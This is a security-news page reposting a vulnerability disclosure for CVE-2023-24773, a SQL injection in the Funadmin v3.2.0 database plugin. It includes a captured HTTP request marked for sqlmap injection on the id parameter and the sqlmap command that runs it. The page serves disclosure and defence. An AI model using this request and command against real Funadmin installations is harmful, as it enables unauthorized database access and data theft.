Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-24773: Database management plug-in database.php list-sql injection vulnerability · Issue #4 · funadmin/funadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.

CVE
#sql#csrf#vulnerability#web#windows#apple#js#java#php#auth#chrome#webkit

Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Database management plug-in database.php list-sql injection vulnerability
Vulnerability occurs in plugin - database management plugin

Code Audit Process
Vulnerability occurs in
app\databases\controller\Database.php#list method

Get the id directly and splice it into the sql statement

Vulnerability reproduction:
Background administrator rights
sqlmap poc save as txt
`POST /databases/database/list?id=* HTTP/1.1
Host: 192.168.3.129:8092
Content-Length: 187
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:8092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D
Connection: close

TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539`
python sqlmap.py -r poc.txt

Related news

GHSA-m8wf-wmwh-jw2m: SQL Injection in Funadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907